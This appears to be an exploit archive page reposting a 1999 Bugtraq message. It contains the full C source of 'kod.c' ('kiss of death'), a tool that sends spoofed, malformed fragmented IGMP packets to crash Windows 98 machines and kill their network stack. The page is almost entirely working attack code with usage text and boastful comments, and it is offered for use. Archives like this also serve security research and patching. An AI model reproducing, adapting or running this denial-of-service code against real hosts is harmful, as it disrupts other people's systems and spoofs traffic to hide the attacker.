what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

windows_kod.txt

windows_kod.txt
Posted Sep 21, 1999

IP stack bug in windows kod.c (kiss of death)

tags | exploit
systems | windows
SHA-256 | 857bcd83acadf4ca3d04875c6abf06e8f57153142eecdc13c9955daaf903dc97

windows_kod.txt

Change Mirror Download
Subject:      ip stack bug in windows kod.c(kiss of death)
To: BUGTRAQ@netspace.org


/*
::: kod.c (kiss of death) version 1.2
::: [author] kod.c bug found by klepto /
klepto@levitate.net / rewritten by ignitor / ignitor@EFnet
::: [stuph ] works on bsd/linux/*nix
::: [notes ] bluescreens windows users(98/98se) and kills
tcp stack
::: [m$ bug] windows handles igmp badly and this is the
result
::: [greets]
amputee/nizda/nyt/ignitor/skyline/codelogic/ill`/conio/egotr
ip/TFreak/napster
::: [greets] dist(test monkey)/naz(you rule period.)/#havok/
#irc_addict/#kgb/#eof/everyone
::: [action] ./kod <host> and BEWM!
::: [rant ] there will be lots of rewrites to this.. just
get our name right!
de omnibus dubitandum
*/


/*
windows core dump output (*whee*)
An exception 0E has occurred at 0028:C14C9212 in VxD VIP
(01) +
00006C72. This was called from 0028:C183FF54 in VcD PPPMAC
(04) +
000079BR. It may be possible to continue normally(*not*).
*/



#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>


struct iphdr
{
unsigned char ihl:4, version:4, tos;
unsigned short tot_len, id, frag_off;
unsigned char ttl, protocol;
unsigned short check;
unsigned int saddr, daddr;
};


struct igmphdr
{
unsigned char type, code;
unsigned short cksum;
struct in_addr group;
};


unsigned short in_chksum(unsigned short *, int);
long resolve(char *);


long resolve(char *host)
{
struct hostent *hst;
long addr;


hst = gethostbyname(host);
if (hst == NULL)
return(-1);


memcpy(&addr, hst->h_addr, hst->h_length);


return(addr);
}


int main(int argc, char *argv[])
{
struct sockaddr_in dst;
struct iphdr *ip;
struct igmphdr *igmp;
long daddr, saddr;
int s, i=0, c, len;
char buf[1500];


if (argc < 3)
{
printf("KOD spoofer by Ignitor and klepto\n");
printf("Usage: %s <src> <dst>\n", *argv);
return(1);
}


daddr = resolve(argv[2]);
saddr = resolve(argv[1]);


memset(buf, 0, 1500);
ip = (struct iphdr *)&buf;
igmp = (struct igmphdr *)&buf[sizeof(struct iphdr)];


dst.sin_addr.s_addr = daddr;
dst.sin_family = AF_INET;


ip->ihl = 5;
ip->version = 4;
ip->tos = 0;
ip->tot_len = htons(10933);
ip->id = htons(48648);
ip->ttl = 64;
ip->protocol = IPPROTO_IGMP;
ip->check = in_chksum((unsigned short *)ip, sizeof(struct
iphdr));
ip->saddr = saddr;
ip->daddr = daddr;


s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (s == -1)
return(1);


printf("Sending IGMP packets: %s -> %s\n", argv[1], argv
[2]);


for (c=0;c<2;c++)
{
len = 220;
ip->frag_off = htons(0x73a);


for (i=0;;i++)
{
if (sendto(s,&buf,len,0,(struct sockaddr *)&dst,sizeof
(struct sockaddr_in)) == -1)
{
perror("Error sending packet");
exit(-1);
}
if (ntohs(ip->frag_off) == 0x2000)
break;
len = 1500;
if (!i)
ip->frag_off = htons(0x2681);
else
ip->frag_off = htons(ntohs(ip->frag_off) - 185);


ip->check = in_chksum((unsigned short *)ip, sizeof
(struct iphdr));
}
}


return(1);
}


unsigned short in_chksum(unsigned short *addr, int len)
{
register int nleft = len;
register int sum = 0;
u_short answer = 0;


while (nleft > 1) {
sum += *addr++;
nleft -= 2;
}


if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)addr;
sum += answer;
}


sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close